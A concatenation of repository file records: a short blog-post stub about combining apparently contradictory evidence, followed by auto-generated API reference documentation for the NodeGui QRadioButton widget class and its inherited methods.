972e47d7f34465b35084771888874d0a44ca92e9 | 1,489 | md | Markdown | content/post/andrewgelman-com-2018-12-30-combining-apparently-contradictory-evidence.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 8 | 2018-03-27T05:17:56.000Z | 2021-09-11T19:18:07.000Z | content/post/andrewgelman-com-2018-12-30-combining-apparently-contradictory-evidence.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 16 | 2018-01-31T04:27:06.000Z | 2021-10-03T19:54:50.000Z | content/post/andrewgelman-com-2018-12-30-combining-apparently-contradictory-evidence.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 12 | 2018-01-27T15:17:26.000Z | 2021-09-07T04:43:12.000Z | ---
title: Combining apparently contradictory evidence
date: '2018-12-30'
linkTitle: https://andrewgelman.com/2018/12/30/combining-apparently-contradictory-evidence/
source: Statistical Modeling, Causal Inference, and Social Science
description: |-
<p>I want to write a more formal article about this, but in the meantime here’s a placeholder. The topic is the combination of apparently contradictory evidence. Let’s start with a simple example: you have some ratings on a 1-10 scale. These could be, for example, research proposals being rated by a funding committee, or, umm, […]</p>
<p>The post <a rel="nofollow" href="https://andrewgelman.com/2018/12/30/combining-apparently-contradictory-evidence/">Combining apparently contradictory evidence</a> appeared first on <a rel="nofollow" href="https://andrewgelman.com">Statistical ...
disable_comments: true
---
<p>I want to write a more formal article about this, but in the meantime here’s a placeholder. The topic is the combination of apparently contradictory evidence. Let’s start with a simple example: you have some ratings on a 1-10 scale. These could be, for example, research proposals being rated by a funding committee, or, umm, […]</p>
<p>The post <a rel="nofollow" href="https://andrewgelman.com/2018/12/30/combining-apparently-contradictory-evidence/">Combining apparently contradictory evidence</a> appeared first on <a rel="nofollow" href="https://andrewgelman.com">Statistical ... | 124.083333 | 356 | 0.775688 | eng_Latn | 0.959743 |
972f3d682cda005bb07f37bde4be57978d969de8 | 27,325 | md | Markdown | website/docs/api/generated/classes/qradiobutton.md | bedna-KU/nodegui | bbf3cfd9bd03cdafbcc0d5a405d2579788a138d2 | [
"MIT"
] | null | null | null | website/docs/api/generated/classes/qradiobutton.md | bedna-KU/nodegui | bbf3cfd9bd03cdafbcc0d5a405d2579788a138d2 | [
"MIT"
] | 4 | 2021-09-02T15:43:12.000Z | 2022-02-27T10:00:48.000Z | website/docs/api/generated/classes/qradiobutton.md | bedna-KU/nodegui | bbf3cfd9bd03cdafbcc0d5a405d2579788a138d2 | [
"MIT"
] | null | null | null | ---
id: "qradiobutton"
title: "QRadioButton"
sidebar_label: "QRadioButton"
---
> Create and control radio button.
**This class is a JS wrapper around Qt's [QRadioButton class](https://doc.qt.io/qt-5/qradiobutton.html)**
A `QRadioButton` provides ability to add and manipulate native radio button widgets.
### Example
```javascript
const { QRadioButton } = require("@nodegui/nodegui");
const radioButton = new QRadioButton();
radioButton.setText("Hello");
```
## Hierarchy
↳ [QAbstractButton](qabstractbutton.md)‹[QRadioButtonSignals](../globals.md#qradiobuttonsignals)›
↳ **QRadioButton**
## Index
### Constructors
* [constructor](qradiobutton.md#constructor)
### Properties
* [_rawInlineStyle](qradiobutton.md#_rawinlinestyle)
* [actions](qradiobutton.md#actions)
* [layout](qradiobutton.md#optional-layout)
* [native](qradiobutton.md#native)
* [nodeChildren](qradiobutton.md#nodechildren)
* [nodeParent](qradiobutton.md#optional-nodeparent)
* [type](qradiobutton.md#type)
### Methods
* [activateWindow](qradiobutton.md#activatewindow)
* [addAction](qradiobutton.md#addaction)
* [addEventListener](qradiobutton.md#addeventlistener)
* [adjustSize](qradiobutton.md#adjustsize)
* [animateClick](qradiobutton.md#animateclick)
* [autoExclusive](qradiobutton.md#autoexclusive)
* [autoRepeat](qradiobutton.md#autorepeat)
* [autoRepeatDelay](qradiobutton.md#autorepeatdelay)
* [autoRepeatInterval](qradiobutton.md#autorepeatinterval)
* [click](qradiobutton.md#click)
* [close](qradiobutton.md#close)
* [font](qradiobutton.md#font)
* [geometry](qradiobutton.md#geometry)
* [getFlexNode](qradiobutton.md#getflexnode)
* [hasMouseTracking](qradiobutton.md#hasmousetracking)
* [hide](qradiobutton.md#hide)
* [icon](qradiobutton.md#icon)
* [iconSize](qradiobutton.md#iconsize)
* [inherits](qradiobutton.md#inherits)
* [isCheckable](qradiobutton.md#ischeckable)
* [isChecked](qradiobutton.md#ischecked)
* [isDown](qradiobutton.md#isdown)
* [isEnabled](qradiobutton.md#isenabled)
* [isVisible](qradiobutton.md#isvisible)
* [lower](qradiobutton.md#lower)
* [move](qradiobutton.md#move)
* [objectName](qradiobutton.md#objectname)
* [pos](qradiobutton.md#pos)
* [property](qradiobutton.md#property)
* [raise](qradiobutton.md#raise)
* [removeEventListener](qradiobutton.md#removeeventlistener)
* [repaint](qradiobutton.md#repaint)
* [resize](qradiobutton.md#resize)
* [setAttribute](qradiobutton.md#setattribute)
* [setAutoExclusive](qradiobutton.md#setautoexclusive)
* [setAutoRepeat](qradiobutton.md#setautorepeat)
* [setAutoRepeatDelay](qradiobutton.md#setautorepeatdelay)
* [setAutoRepeatInterval](qradiobutton.md#setautorepeatinterval)
* [setCheckable](qradiobutton.md#setcheckable)
* [setChecked](qradiobutton.md#setchecked)
* [setContextMenuPolicy](qradiobutton.md#setcontextmenupolicy)
* [setCursor](qradiobutton.md#setcursor)
* [setDown](qradiobutton.md#setdown)
* [setEnabled](qradiobutton.md#setenabled)
* [setFixedSize](qradiobutton.md#setfixedsize)
* [setFlexNodeSizeControlled](qradiobutton.md#setflexnodesizecontrolled)
* [setFont](qradiobutton.md#setfont)
* [setGeometry](qradiobutton.md#setgeometry)
* [setIcon](qradiobutton.md#seticon)
* [setIconSize](qradiobutton.md#seticonsize)
* [setInlineStyle](qradiobutton.md#setinlinestyle)
* [setLayout](qradiobutton.md#setlayout)
* [setMaximumSize](qradiobutton.md#setmaximumsize)
* [setMinimumSize](qradiobutton.md#setminimumsize)
* [setMouseTracking](qradiobutton.md#setmousetracking)
* [setNodeParent](qradiobutton.md#setnodeparent)
* [setObjectName](qradiobutton.md#setobjectname)
* [setProperty](qradiobutton.md#setproperty)
* [setShortcut](qradiobutton.md#setshortcut)
* [setStyleSheet](qradiobutton.md#setstylesheet)
* [setText](qradiobutton.md#settext)
* [setWindowFlag](qradiobutton.md#setwindowflag)
* [setWindowIcon](qradiobutton.md#setwindowicon)
* [setWindowOpacity](qradiobutton.md#setwindowopacity)
* [setWindowState](qradiobutton.md#setwindowstate)
* [setWindowTitle](qradiobutton.md#setwindowtitle)
* [shortcut](qradiobutton.md#shortcut)
* [show](qradiobutton.md#show)
* [showFullScreen](qradiobutton.md#showfullscreen)
* [showMaximized](qradiobutton.md#showmaximized)
* [showMinimized](qradiobutton.md#showminimized)
* [showNormal](qradiobutton.md#shownormal)
* [size](qradiobutton.md#size)
* [styleSheet](qradiobutton.md#stylesheet)
* [testAttribute](qradiobutton.md#testattribute)
* [text](qradiobutton.md#text)
* [toggle](qradiobutton.md#toggle)
* [update](qradiobutton.md#update)
* [updateGeometry](qradiobutton.md#updategeometry)
* [windowOpacity](qradiobutton.md#windowopacity)
* [windowState](qradiobutton.md#windowstate)
* [windowTitle](qradiobutton.md#windowtitle)
## Constructors
### constructor
\+ **new QRadioButton**(): *[QRadioButton](qradiobutton.md)*
*Overrides [EventWidget](eventwidget.md).[constructor](eventwidget.md#constructor)*
**Returns:** *[QRadioButton](qradiobutton.md)*
\+ **new QRadioButton**(`parent`: [NodeWidget](nodewidget.md)‹any›): *[QRadioButton](qradiobutton.md)*
*Overrides [EventWidget](eventwidget.md).[constructor](eventwidget.md#constructor)*
**Parameters:**
Name | Type |
------ | ------ |
`parent` | [NodeWidget](nodewidget.md)‹any› |
**Returns:** *[QRadioButton](qradiobutton.md)*
\+ **new QRadioButton**(`rawPointer`: [NativeRawPointer](../globals.md#nativerawpointer)‹any›, `disableNativeDeletion?`: undefined | false | true): *[QRadioButton](qradiobutton.md)*
*Overrides [EventWidget](eventwidget.md).[constructor](eventwidget.md#constructor)*
**Parameters:**
Name | Type |
------ | ------ |
`rawPointer` | [NativeRawPointer](../globals.md#nativerawpointer)‹any› |
`disableNativeDeletion?` | undefined | false | true |
**Returns:** *[QRadioButton](qradiobutton.md)*
## Properties
### _rawInlineStyle
• **_rawInlineStyle**: *string* = ""
*Inherited from [QMenu](qmenu.md).[_rawInlineStyle](qmenu.md#_rawinlinestyle)*
___
### actions
• **actions**: *Set‹[QAction](qaction.md)‹››* = new Set<QAction>()
*Inherited from [QMenu](qmenu.md).[actions](qmenu.md#actions)*
___
### `Optional` layout
• **layout**? : *[NodeLayout](nodelayout.md)‹[QRadioButtonSignals](../globals.md#qradiobuttonsignals)›*
*Inherited from [QMenu](qmenu.md).[layout](qmenu.md#optional-layout)*
___
### native
• **native**: *[NativeElement](../globals.md#nativeelement)*
*Overrides [Component](component.md).[native](component.md#abstract-native)*
___
### nodeChildren
• **nodeChildren**: *Set‹[Component](component.md)›*
*Inherited from [Component](component.md).[nodeChildren](component.md#nodechildren)*
___
### `Optional` nodeParent
• **nodeParent**? : *[Component](component.md)*
*Inherited from [Component](component.md).[nodeParent](component.md#optional-nodeparent)*
___
### type
• **type**: *string* = "widget"
*Inherited from [QMenu](qmenu.md).[type](qmenu.md#type)*
## Methods
### activateWindow
▸ **activateWindow**(): *void*
*Inherited from [QMenu](qmenu.md).[activateWindow](qmenu.md#activatewindow)*
**Returns:** *void*
___
### addAction
▸ **addAction**(`action`: [QAction](qaction.md) | string): *[QAction](qaction.md)*
*Inherited from [QMenu](qmenu.md).[addAction](qmenu.md#addaction)*
**Parameters:**
Name | Type |
------ | ------ |
`action` | [QAction](qaction.md) | string |
**Returns:** *[QAction](qaction.md)*
___
### addEventListener
▸ **addEventListener**<**SignalType**>(`signalType`: SignalType, `callback`: QRadioButtonSignals[SignalType]): *void*
*Inherited from [EventWidget](eventwidget.md).[addEventListener](eventwidget.md#addeventlistener)*
**Type parameters:**
▪ **SignalType**: *keyof QRadioButtonSignals*
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`signalType` | SignalType | SignalType is a signal from the widgets signals interface. |
`callback` | QRadioButtonSignals[SignalType] | Corresponding callback for the signal as mentioned in the widget's signal interface |
**Returns:** *void*
void
For example in the case of QPushButton:
```js
const button = new QPushButton();
button.addEventListener('clicked',(checked)=>console.log("clicked"));
// here clicked is a value from QPushButtonSignals interface
```
▸ **addEventListener**(`eventType`: [WidgetEventTypes](../enums/widgeteventtypes.md), `callback`: function): *void*
*Inherited from [EventWidget](eventwidget.md).[addEventListener](eventwidget.md#addeventlistener)*
**Parameters:**
▪ **eventType**: *[WidgetEventTypes](../enums/widgeteventtypes.md)*
▪ **callback**: *function*
For example in the case of QPushButton:
```js
const button = new QPushButton();
button.addEventListener(WidgetEventTypes.HoverEnter,()=>console.log("hovered"));
```
▸ (`event?`: [NativeRawPointer](../globals.md#nativerawpointer)‹"QEvent"›): *void*
**Parameters:**
Name | Type |
------ | ------ |
`event?` | [NativeRawPointer](../globals.md#nativerawpointer)‹"QEvent"› |
**Returns:** *void*
___
### adjustSize
▸ **adjustSize**(): *void*
*Inherited from [QMenu](qmenu.md).[adjustSize](qmenu.md#adjustsize)*
**Returns:** *void*
___
### animateClick
▸ **animateClick**(`msec`: number): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[animateClick](qabstractbutton.md#animateclick)*
**Parameters:**
Name | Type |
------ | ------ |
`msec` | number |
**Returns:** *void*
___
### autoExclusive
▸ **autoExclusive**(): *boolean*
*Inherited from [QAbstractButton](qabstractbutton.md).[autoExclusive](qabstractbutton.md#autoexclusive)*
**Returns:** *boolean*
___
### autoRepeat
▸ **autoRepeat**(): *boolean*
*Inherited from [QAbstractButton](qabstractbutton.md).[autoRepeat](qabstractbutton.md#autorepeat)*
**Returns:** *boolean*
___
### autoRepeatDelay
▸ **autoRepeatDelay**(): *number*
*Inherited from [QAbstractButton](qabstractbutton.md).[autoRepeatDelay](qabstractbutton.md#autorepeatdelay)*
**Returns:** *number*
___
### autoRepeatInterval
▸ **autoRepeatInterval**(): *number*
*Inherited from [QAbstractButton](qabstractbutton.md).[autoRepeatInterval](qabstractbutton.md#autorepeatinterval)*
**Returns:** *number*
___
### click
▸ **click**(): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[click](qabstractbutton.md#click)*
**Returns:** *void*
___
### close
▸ **close**(): *boolean*
*Inherited from [QMenu](qmenu.md).[close](qmenu.md#close)*
**Returns:** *boolean*
___
### font
▸ **font**(): *[QFont](qfont.md)*
*Inherited from [QMenu](qmenu.md).[font](qmenu.md#font)*
**Returns:** *[QFont](qfont.md)*
___
### geometry
▸ **geometry**(): *[QRect](qrect.md)*
*Inherited from [QMenu](qmenu.md).[geometry](qmenu.md#geometry)*
**Returns:** *[QRect](qrect.md)*
___
### getFlexNode
▸ **getFlexNode**(): *[FlexNode](../globals.md#flexnode)*
*Inherited from [YogaWidget](yogawidget.md).[getFlexNode](yogawidget.md#getflexnode)*
**Returns:** *[FlexNode](../globals.md#flexnode)*
___
### hasMouseTracking
▸ **hasMouseTracking**(): *boolean*
*Inherited from [QMenu](qmenu.md).[hasMouseTracking](qmenu.md#hasmousetracking)*
**Returns:** *boolean*
___
### hide
▸ **hide**(): *void*
*Inherited from [QMenu](qmenu.md).[hide](qmenu.md#hide)*
**Returns:** *void*
___
### icon
▸ **icon**(): *[QIcon](qicon.md)*
*Inherited from [QAbstractButton](qabstractbutton.md).[icon](qabstractbutton.md#icon)*
**Returns:** *[QIcon](qicon.md)*
___
### iconSize
▸ **iconSize**(): *[QSize](qsize.md)*
*Inherited from [QAbstractButton](qabstractbutton.md).[iconSize](qabstractbutton.md#iconsize)*
**Returns:** *[QSize](qsize.md)*
___
### inherits
▸ **inherits**(`className`: string): *boolean*
*Inherited from [NodeObject](nodeobject.md).[inherits](nodeobject.md#inherits)*
**Parameters:**
Name | Type |
------ | ------ |
`className` | string |
**Returns:** *boolean*
___
### isCheckable
▸ **isCheckable**(): *boolean*
*Inherited from [QAbstractButton](qabstractbutton.md).[isCheckable](qabstractbutton.md#ischeckable)*
**Returns:** *boolean*
___
### isChecked
▸ **isChecked**(): *boolean*
*Inherited from [QAbstractButton](qabstractbutton.md).[isChecked](qabstractbutton.md#ischecked)*
**Returns:** *boolean*
___
### isDown
▸ **isDown**(): *boolean*
*Inherited from [QAbstractButton](qabstractbutton.md).[isDown](qabstractbutton.md#isdown)*
**Returns:** *boolean*
___
### isEnabled
▸ **isEnabled**(): *boolean*
*Inherited from [QMenu](qmenu.md).[isEnabled](qmenu.md#isenabled)*
**Returns:** *boolean*
___
### isVisible
▸ **isVisible**(): *boolean*
*Inherited from [QMenu](qmenu.md).[isVisible](qmenu.md#isvisible)*
**Returns:** *boolean*
___
### lower
▸ **lower**(): *void*
*Inherited from [QMenu](qmenu.md).[lower](qmenu.md#lower)*
**Returns:** *void*
___
### move
▸ **move**(`x`: number, `y`: number): *void*
*Inherited from [QMenu](qmenu.md).[move](qmenu.md#move)*
**Parameters:**
Name | Type |
------ | ------ |
`x` | number |
`y` | number |
**Returns:** *void*
___
### objectName
▸ **objectName**(): *string*
*Inherited from [NodeObject](nodeobject.md).[objectName](nodeobject.md#objectname)*
**Returns:** *string*
___
### pos
▸ **pos**(): *object*
*Inherited from [QMenu](qmenu.md).[pos](qmenu.md#pos)*
**Returns:** *object*
* **x**: *number*
* **y**: *number*
___
### property
▸ **property**(`name`: string): *[QVariant](qvariant.md)*
*Inherited from [NodeObject](nodeobject.md).[property](nodeobject.md#property)*
**Parameters:**
Name | Type |
------ | ------ |
`name` | string |
**Returns:** *[QVariant](qvariant.md)*
___
### raise
▸ **raise**(): *void*
*Inherited from [QMenu](qmenu.md).[raise](qmenu.md#raise)*
**Returns:** *void*
___
### removeEventListener
▸ **removeEventListener**<**SignalType**>(`signalType`: SignalType, `callback`: QRadioButtonSignals[SignalType]): *void*
*Inherited from [EventWidget](eventwidget.md).[removeEventListener](eventwidget.md#removeeventlistener)*
**Type parameters:**
▪ **SignalType**: *keyof QRadioButtonSignals*
**Parameters:**
Name | Type |
------ | ------ |
`signalType` | SignalType |
`callback` | QRadioButtonSignals[SignalType] |
**Returns:** *void*
▸ **removeEventListener**(`eventType`: [WidgetEventTypes](../enums/widgeteventtypes.md), `callback`: function): *void*
*Inherited from [EventWidget](eventwidget.md).[removeEventListener](eventwidget.md#removeeventlistener)*
**Parameters:**
▪ **eventType**: *[WidgetEventTypes](../enums/widgeteventtypes.md)*
▪ **callback**: *function*
▸ (`event?`: [NativeRawPointer](../globals.md#nativerawpointer)‹"QEvent"›): *void*
**Parameters:**
Name | Type |
------ | ------ |
`event?` | [NativeRawPointer](../globals.md#nativerawpointer)‹"QEvent"› |
**Returns:** *void*
___
### repaint
▸ **repaint**(): *void*
*Inherited from [QMenu](qmenu.md).[repaint](qmenu.md#repaint)*
**Returns:** *void*
___
### resize
▸ **resize**(`width`: number, `height`: number): *void*
*Inherited from [QMenu](qmenu.md).[resize](qmenu.md#resize)*
**Parameters:**
Name | Type |
------ | ------ |
`width` | number |
`height` | number |
**Returns:** *void*
___
### setAttribute
▸ **setAttribute**(`attribute`: [WidgetAttribute](../enums/widgetattribute.md), `switchOn`: boolean): *void*
*Inherited from [QMenu](qmenu.md).[setAttribute](qmenu.md#setattribute)*
**Parameters:**
Name | Type |
------ | ------ |
`attribute` | [WidgetAttribute](../enums/widgetattribute.md) |
`switchOn` | boolean |
**Returns:** *void*
___
### setAutoExclusive
▸ **setAutoExclusive**(`enable`: boolean): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setAutoExclusive](qabstractbutton.md#setautoexclusive)*
**Parameters:**
Name | Type |
------ | ------ |
`enable` | boolean |
**Returns:** *void*
___
### setAutoRepeat
▸ **setAutoRepeat**(`enable`: boolean): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setAutoRepeat](qabstractbutton.md#setautorepeat)*
**Parameters:**
Name | Type |
------ | ------ |
`enable` | boolean |
**Returns:** *void*
___
### setAutoRepeatDelay
▸ **setAutoRepeatDelay**(`delay`: number): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setAutoRepeatDelay](qabstractbutton.md#setautorepeatdelay)*
**Parameters:**
Name | Type |
------ | ------ |
`delay` | number |
**Returns:** *void*
___
### setAutoRepeatInterval
▸ **setAutoRepeatInterval**(`interval`: number): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setAutoRepeatInterval](qabstractbutton.md#setautorepeatinterval)*
**Parameters:**
Name | Type |
------ | ------ |
`interval` | number |
**Returns:** *void*
___
### setCheckable
▸ **setCheckable**(`checkable`: boolean): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setCheckable](qabstractbutton.md#setcheckable)*
**Parameters:**
Name | Type |
------ | ------ |
`checkable` | boolean |
**Returns:** *void*
___
### setChecked
▸ **setChecked**(`checked`: boolean): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setChecked](qabstractbutton.md#setchecked)*
**Parameters:**
Name | Type |
------ | ------ |
`checked` | boolean |
**Returns:** *void*
___
### setContextMenuPolicy
▸ **setContextMenuPolicy**(`contextMenuPolicy`: [ContextMenuPolicy](../enums/contextmenupolicy.md)): *void*
*Inherited from [QMenu](qmenu.md).[setContextMenuPolicy](qmenu.md#setcontextmenupolicy)*
**Parameters:**
Name | Type |
------ | ------ |
`contextMenuPolicy` | [ContextMenuPolicy](../enums/contextmenupolicy.md) |
**Returns:** *void*
___
### setCursor
▸ **setCursor**(`cursor`: [CursorShape](../enums/cursorshape.md) | [QCursor](qcursor.md)): *void*
*Inherited from [QMenu](qmenu.md).[setCursor](qmenu.md#setcursor)*
**Parameters:**
Name | Type |
------ | ------ |
`cursor` | [CursorShape](../enums/cursorshape.md) | [QCursor](qcursor.md) |
**Returns:** *void*
___
### setDown
▸ **setDown**(`down`: boolean): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setDown](qabstractbutton.md#setdown)*
**Parameters:**
Name | Type |
------ | ------ |
`down` | boolean |
**Returns:** *void*
___
### setEnabled
▸ **setEnabled**(`enabled`: boolean): *void*
*Inherited from [QMenu](qmenu.md).[setEnabled](qmenu.md#setenabled)*
**Parameters:**
Name | Type |
------ | ------ |
`enabled` | boolean |
**Returns:** *void*
___
### setFixedSize
▸ **setFixedSize**(`width`: number, `height`: number): *void*
*Inherited from [QMenu](qmenu.md).[setFixedSize](qmenu.md#setfixedsize)*
**Parameters:**
Name | Type |
------ | ------ |
`width` | number |
`height` | number |
**Returns:** *void*
___
### setFlexNodeSizeControlled
▸ **setFlexNodeSizeControlled**(`isSizeControlled`: boolean): *void*
*Inherited from [YogaWidget](yogawidget.md).[setFlexNodeSizeControlled](yogawidget.md#setflexnodesizecontrolled)*
sets whether the widget's size is controlled by someone else (for example a window's size is controlled by its frame when dragged).
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`isSizeControlled` | boolean | |
**Returns:** *void*
___
### setFont
▸ **setFont**(`font`: [QFont](qfont.md)): *void*
*Inherited from [QMenu](qmenu.md).[setFont](qmenu.md#setfont)*
**Parameters:**
Name | Type |
------ | ------ |
`font` | [QFont](qfont.md) |
**Returns:** *void*
___
### setGeometry
▸ **setGeometry**(`x`: number, `y`: number, `w`: number, `h`: number): *void*
*Inherited from [QMenu](qmenu.md).[setGeometry](qmenu.md#setgeometry)*
**Parameters:**
Name | Type |
------ | ------ |
`x` | number |
`y` | number |
`w` | number |
`h` | number |
**Returns:** *void*
___
### setIcon
▸ **setIcon**(`icon`: [QIcon](qicon.md)): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setIcon](qabstractbutton.md#seticon)*
**Parameters:**
Name | Type |
------ | ------ |
`icon` | [QIcon](qicon.md) |
**Returns:** *void*
___
### setIconSize
▸ **setIconSize**(`iconSize`: [QSize](qsize.md)): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setIconSize](qabstractbutton.md#seticonsize)*
**Parameters:**
Name | Type |
------ | ------ |
`iconSize` | [QSize](qsize.md) |
**Returns:** *void*
___
### setInlineStyle
▸ **setInlineStyle**(`style`: string): *void*
*Inherited from [QMenu](qmenu.md).[setInlineStyle](qmenu.md#setinlinestyle)*
**Parameters:**
Name | Type |
------ | ------ |
`style` | string |
**Returns:** *void*
___
### setLayout
▸ **setLayout**(`parentLayout`: [NodeLayout](nodelayout.md)‹[QRadioButtonSignals](../globals.md#qradiobuttonsignals)›): *void*
*Inherited from [QMenu](qmenu.md).[setLayout](qmenu.md#setlayout)*
**Parameters:**
Name | Type |
------ | ------ |
`parentLayout` | [NodeLayout](nodelayout.md)‹[QRadioButtonSignals](../globals.md#qradiobuttonsignals)› |
**Returns:** *void*
___
### setMaximumSize
▸ **setMaximumSize**(`maxw`: number, `maxh`: number): *void*
*Inherited from [QMenu](qmenu.md).[setMaximumSize](qmenu.md#setmaximumsize)*
**Parameters:**
Name | Type |
------ | ------ |
`maxw` | number |
`maxh` | number |
**Returns:** *void*
___
### setMinimumSize
▸ **setMinimumSize**(`minw`: number, `minh`: number): *void*
*Inherited from [QMenu](qmenu.md).[setMinimumSize](qmenu.md#setminimumsize)*
**Parameters:**
Name | Type |
------ | ------ |
`minw` | number |
`minh` | number |
**Returns:** *void*
___
### setMouseTracking
▸ **setMouseTracking**(`isMouseTracked`: boolean): *void*
*Inherited from [QMenu](qmenu.md).[setMouseTracking](qmenu.md#setmousetracking)*
**Parameters:**
Name | Type |
------ | ------ |
`isMouseTracked` | boolean |
**Returns:** *void*
___
### setNodeParent
▸ **setNodeParent**(`parent?`: [Component](component.md)): *void*
*Inherited from [Component](component.md).[setNodeParent](component.md#setnodeparent)*
**Parameters:**
Name | Type |
------ | ------ |
`parent?` | [Component](component.md) |
**Returns:** *void*
___
### setObjectName
▸ **setObjectName**(`objectName`: string): *void*
*Inherited from [QMenu](qmenu.md).[setObjectName](qmenu.md#setobjectname)*
*Overrides [NodeObject](nodeobject.md).[setObjectName](nodeobject.md#setobjectname)*
**Parameters:**
Name | Type |
------ | ------ |
`objectName` | string |
**Returns:** *void*
___
### setProperty
▸ **setProperty**(`name`: string, `value`: [QVariantType](../globals.md#qvarianttype)): *boolean*
*Inherited from [NodeObject](nodeobject.md).[setProperty](nodeobject.md#setproperty)*
**Parameters:**
Name | Type |
------ | ------ |
`name` | string |
`value` | [QVariantType](../globals.md#qvarianttype) |
**Returns:** *boolean*
___
### setShortcut
▸ **setShortcut**(`key`: [QKeySequence](qkeysequence.md)): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setShortcut](qabstractbutton.md#setshortcut)*
**Parameters:**
Name | Type |
------ | ------ |
`key` | [QKeySequence](qkeysequence.md) |
**Returns:** *void*
___
### setStyleSheet
▸ **setStyleSheet**(`styleSheet`: string): *void*
*Inherited from [QMenu](qmenu.md).[setStyleSheet](qmenu.md#setstylesheet)*
**Parameters:**
Name | Type |
------ | ------ |
`styleSheet` | string |
**Returns:** *void*
___
### setText
▸ **setText**(`text`: string): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[setText](qabstractbutton.md#settext)*
**Parameters:**
Name | Type |
------ | ------ |
`text` | string |
**Returns:** *void*
___
### setWindowFlag
▸ **setWindowFlag**(`windowType`: [WindowType](../enums/windowtype.md), `switchOn`: boolean): *void*
*Inherited from [QMenu](qmenu.md).[setWindowFlag](qmenu.md#setwindowflag)*
**Parameters:**
Name | Type |
------ | ------ |
`windowType` | [WindowType](../enums/windowtype.md) |
`switchOn` | boolean |
**Returns:** *void*
___
### setWindowIcon
▸ **setWindowIcon**(`icon`: [QIcon](qicon.md)): *void*
*Inherited from [QMenu](qmenu.md).[setWindowIcon](qmenu.md#setwindowicon)*
**Parameters:**
Name | Type |
------ | ------ |
`icon` | [QIcon](qicon.md) |
**Returns:** *void*
___
### setWindowOpacity
▸ **setWindowOpacity**(`opacity`: number): *void*
*Inherited from [QMenu](qmenu.md).[setWindowOpacity](qmenu.md#setwindowopacity)*
**Parameters:**
Name | Type |
------ | ------ |
`opacity` | number |
**Returns:** *void*
___
### setWindowState
▸ **setWindowState**(`state`: [WindowState](../enums/windowstate.md)): *void*
*Inherited from [QMenu](qmenu.md).[setWindowState](qmenu.md#setwindowstate)*
**Parameters:**
Name | Type |
------ | ------ |
`state` | [WindowState](../enums/windowstate.md) |
**Returns:** *void*
___
### setWindowTitle
▸ **setWindowTitle**(`title`: string): *void*
*Inherited from [QMenu](qmenu.md).[setWindowTitle](qmenu.md#setwindowtitle)*
**Parameters:**
Name | Type |
------ | ------ |
`title` | string |
**Returns:** *void*
___
### shortcut
▸ **shortcut**(): *[QKeySequence](qkeysequence.md)*
*Inherited from [QAbstractButton](qabstractbutton.md).[shortcut](qabstractbutton.md#shortcut)*
**Returns:** *[QKeySequence](qkeysequence.md)*
___
### show
▸ **show**(): *void*
*Inherited from [QMenu](qmenu.md).[show](qmenu.md#show)*
**Returns:** *void*
___
### showFullScreen
▸ **showFullScreen**(): *void*
*Inherited from [QMenu](qmenu.md).[showFullScreen](qmenu.md#showfullscreen)*
**Returns:** *void*
___
### showMaximized
▸ **showMaximized**(): *void*
*Inherited from [QMenu](qmenu.md).[showMaximized](qmenu.md#showmaximized)*
**Returns:** *void*
___
### showMinimized
▸ **showMinimized**(): *void*
*Inherited from [QMenu](qmenu.md).[showMinimized](qmenu.md#showminimized)*
**Returns:** *void*
___
### showNormal
▸ **showNormal**(): *void*
*Inherited from [QMenu](qmenu.md).[showNormal](qmenu.md#shownormal)*
**Returns:** *void*
___
### size
▸ **size**(): *[QSize](qsize.md)*
*Inherited from [QMenu](qmenu.md).[size](qmenu.md#size)*
**Returns:** *[QSize](qsize.md)*
___
### styleSheet
▸ **styleSheet**(): *string*
*Inherited from [QMenu](qmenu.md).[styleSheet](qmenu.md#stylesheet)*
**Returns:** *string*
___
### testAttribute
▸ **testAttribute**(`attribute`: [WidgetAttribute](../enums/widgetattribute.md)): *boolean*
*Inherited from [QMenu](qmenu.md).[testAttribute](qmenu.md#testattribute)*
**Parameters:**
Name | Type |
------ | ------ |
`attribute` | [WidgetAttribute](../enums/widgetattribute.md) |
**Returns:** *boolean*
___
### text
▸ **text**(): *string*
*Inherited from [QAbstractButton](qabstractbutton.md).[text](qabstractbutton.md#text)*
**Returns:** *string*
___
### toggle
▸ **toggle**(): *void*
*Inherited from [QAbstractButton](qabstractbutton.md).[toggle](qabstractbutton.md#toggle)*
**Returns:** *void*
___
### update
▸ **update**(): *void*
*Inherited from [QMenu](qmenu.md).[update](qmenu.md#update)*
**Returns:** *void*
___
### updateGeometry
▸ **updateGeometry**(): *void*
*Inherited from [QMenu](qmenu.md).[updateGeometry](qmenu.md#updategeometry)*
**Returns:** *void*
___
### windowOpacity
▸ **windowOpacity**(): *number*
*Inherited from [QMenu](qmenu.md).[windowOpacity](qmenu.md#windowopacity)*
**Returns:** *number*
___
### windowState
▸ **windowState**(): *number*
*Inherited from [QMenu](qmenu.md).[windowState](qmenu.md#windowstate)*
**Returns:** *number*
___
### windowTitle
▸ **windowTitle**(): *string*
*Inherited from [QMenu](qmenu.md).[windowTitle](qmenu.md#windowtitle)*
**Returns:** *string*
| 19.872727 | 181 | 0.674437 | yue_Hant | 0.419024 |
973030fe18131b3bc8ca8b4d6d82d0c92f4ac244 | 2,828 | md | Markdown | doc/man/pt_enc_get_config.3.md | tbaederr/libipt | dcdda58cf5e98af1a0e8f36a133c72d602b0a116 | [
"BSD-3-Clause"
] | null | null | null | doc/man/pt_enc_get_config.3.md | tbaederr/libipt | dcdda58cf5e98af1a0e8f36a133c72d602b0a116 | [
